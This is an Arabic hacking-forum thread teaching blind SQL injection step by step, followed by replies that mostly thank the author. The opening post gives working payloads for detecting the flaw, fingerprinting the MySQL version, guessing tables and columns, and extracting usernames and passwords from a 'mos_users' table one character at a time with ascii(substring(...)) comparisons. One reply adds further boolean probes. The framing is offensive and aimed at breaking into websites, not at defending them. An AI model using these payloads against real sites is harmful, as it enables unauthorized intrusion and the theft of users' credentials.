ترتيب الخطوات للبلايد سكول

KaLa$nikoV · 10-29-2009, 08:36 PM

ربنا يوفقني

volcano
بتعلم هكر البلايند
وان شاء الله ينجح بالتعليم

اقتباس


	volcano

بقلك فولكانو لا تفكر تخترق بالبلايند اذا ما بتعرف تقليدي

يلا نتابع

امر اكتشاف الخطأ

اقتباس


	'

2- امر التاكد من ان البلايند يعمل

اقتباس


	and (select 1)=1

3- امر معرفه اصدار القاعده

اقتباس


	and substring(@@version,1,1)=5

اقتباس


	and substring(@@version,1,1)=4

4- امر لمعرفه اسم الجدول نستعمل امر

اقتباس


	and (select 1 from table_name limit 0,1)=1

5-

امر لمعرفه اسم عامود اليوزر والباسوورد نستعمل هذا الامر

اقتباس


	and (select substring(concat(1,column_name),1,1) from table_name limit 0,1)=1

6- اليوزر نيم والباسورد بحقنه واحده

اقتباس


	and (select substring(concat(1,concat(username,0x3a,password)) ,1,1) from mos_users limit 0,1)=1

7-

اللعب مع تشفير
ascii
لاستخارج اليوزر والباسورد
فولكانو هكر تابع

اقتباس


	and ascii(substring((SELECT concat(username,0x3a,password) from mos_users limit 0,1),1,1))>1

هنا نزود باللعبه

على

اقتباس


	1,1))>1

سطر فولكانو الاحمر انتبه
-------------------volcano--------------------

اقتباس


	1,1))>2

اقتباس


	1,1))>3

وهكذا ليطلع لنا الخطا

ثم بعدها نلعب بنفس الطريقه لكن العد بكون هون

اقتباس


	2,1))>1

ونكمل بزياده على نفس الاسلوب
من عند سطر فولكانو الاحمر
السابق
لحتى يرجع لنا خطا
وهطذا

الان بس نخلص نجمع الارقام الي تطلع لنا

ونروح لهذا الموقع

اقتباس


	http://www.commentcamarche.net/co nt...ase/ascii.php3

لحتى نفك التشفير

بالتوفيق

ولا اخو 8898998
يسرق الموضوع لانه فهي اخطاء لسا ما خلصته
بس اخلصه بقلكم الطشوه يا 89088

المصدر: :: vBspiders Professional Network ::

jvjdf hgo',hj ggfghd] s;,g

MrXRoMaNcE1 · 10-29-2009, 09:37 PM

يعطيك العافية

اضافة بسيطة لاكتشاف تغرة

كود PHP:

  +and+1=1

لا يحدث تغير لاكن عندما نضع

كود PHP:

  +and+1=0

يحدث تغير بصفحة لو بسيط او كبير او ممكن يظهر خطأ هكذا نعرف انها بلايند

وبالنسبة لمعرفة اصدار قاعدة

نضع

كود PHP:

  AND SUBSTRING(@@version,1,1)=4

اذا تغير محتوى صفحة يعني اصدار ليس 4

نجرب امر تالي

كود PHP:

  AND SUBSTRING(@@version,1,1)=5

اذا ما تغير هذا يعني انه الاصدار 5

ويعطيك العافية بانتظار جديدك يالغالي

topo18 معجب بهذا

KaLa$nikoV · 10-29-2009, 09:45 PM

يسلمو فايروس هكر ع الاضافه والتوضيح بارك الله فيك

actionman2007 · 12-25-2009, 08:59 AM

الف الف شكر
الدرس بيساعد على تطبيق الثغره

Tr0j4n · 01-08-2010, 06:42 PM

مشكور فولكانو
مشكور

T3BaN_HaCkEr · 01-12-2010, 08:52 AM

يسلمو يا حجاج

اول مرة بسمع فيها

يلا معاكم نتعلم شوو علينا

ToRn4Do · 01-12-2010, 11:15 AM

يعطيكم العافية شباب مبدعين

مشكور يا فولكانو

اقبل مروري

M!M0 · 01-12-2010, 03:53 PM

شـكــ وبارك الله فيك ـــرا لك

Dr.NaNo · 02-08-2010, 09:33 PM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

مستر داتا بيز · 05-13-2010, 02:58 AM

يسلمو اخى فولكانو
بس لازم تعملنا درس فيديو
لان الحوار ده كده قالب دماغى

مش قادر افكر فيه
ياريت اخى اكرمك الله تعرفلنا ما هو هاكر البلايند والكلام ده

ضرووووووووووووووووووووورى

Prince-Of-Hacker · 07-25-2010, 05:10 PM

الف الف شكر
الدرس بيساعد على تطبيق الثغره

Prince-Of-Hacker · 07-25-2010, 05:13 PM

بس يا ليت تسوي شرح في الفيديو حبيبي بكون اسهل علينا تقبل مروري

DR.THMoORY · 08-20-2010, 02:52 PM

سهلت علينا والله يسلمو حبيبي

Dr.jmjmah · 11-17-2010, 07:11 AM

مشششكور والله يع‘ـطيك العافيه يـآمبـــــــــــدعَ

H3x HaCkeR · 12-03-2010, 01:08 AM

مشكور على الدرس الجميل
لكني عندي ملاحــظــة :D
الـ Blind SQL فرقها عن الـ SQL injection
شي بسيط الا وهو
الفرق الأساسي والوحيد بين هالنوعين ان الأول لا يظهر ناتج الاستعلامات.. والسبب برمجي لاغير << !!!!
في الثغرة التقليدية, سبب ظهور ارقام الاستغلال او الأعمدة وغيره هو وجود تعليمة print او echo في الكود لطباعة الأعمدة, في حال ماكانت موجودة فرح يظهرلك البلايند وقتها.
يعني لاتعتمد اعتماد كلي على علامــة '

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
ترتيب الخطوات في حقن قواعد البيانات SQL Injection	KaLa$nikoV	SQL قواعد البيانات	127	05-03-2017 08:12 PM
موقع االجيش الروسي مصاب بثغرة سكول	portgas	Hackers Showoff	5	01-01-2011 05:20 AM
بعض الخطوات لحماية ssh	Br.l!nc	حمـــاية السيــرفرات والمواقـــع	3	07-03-2009 01:14 AM

ترتيب الخطوات للبلايد سكول

SQL قواعد البيانات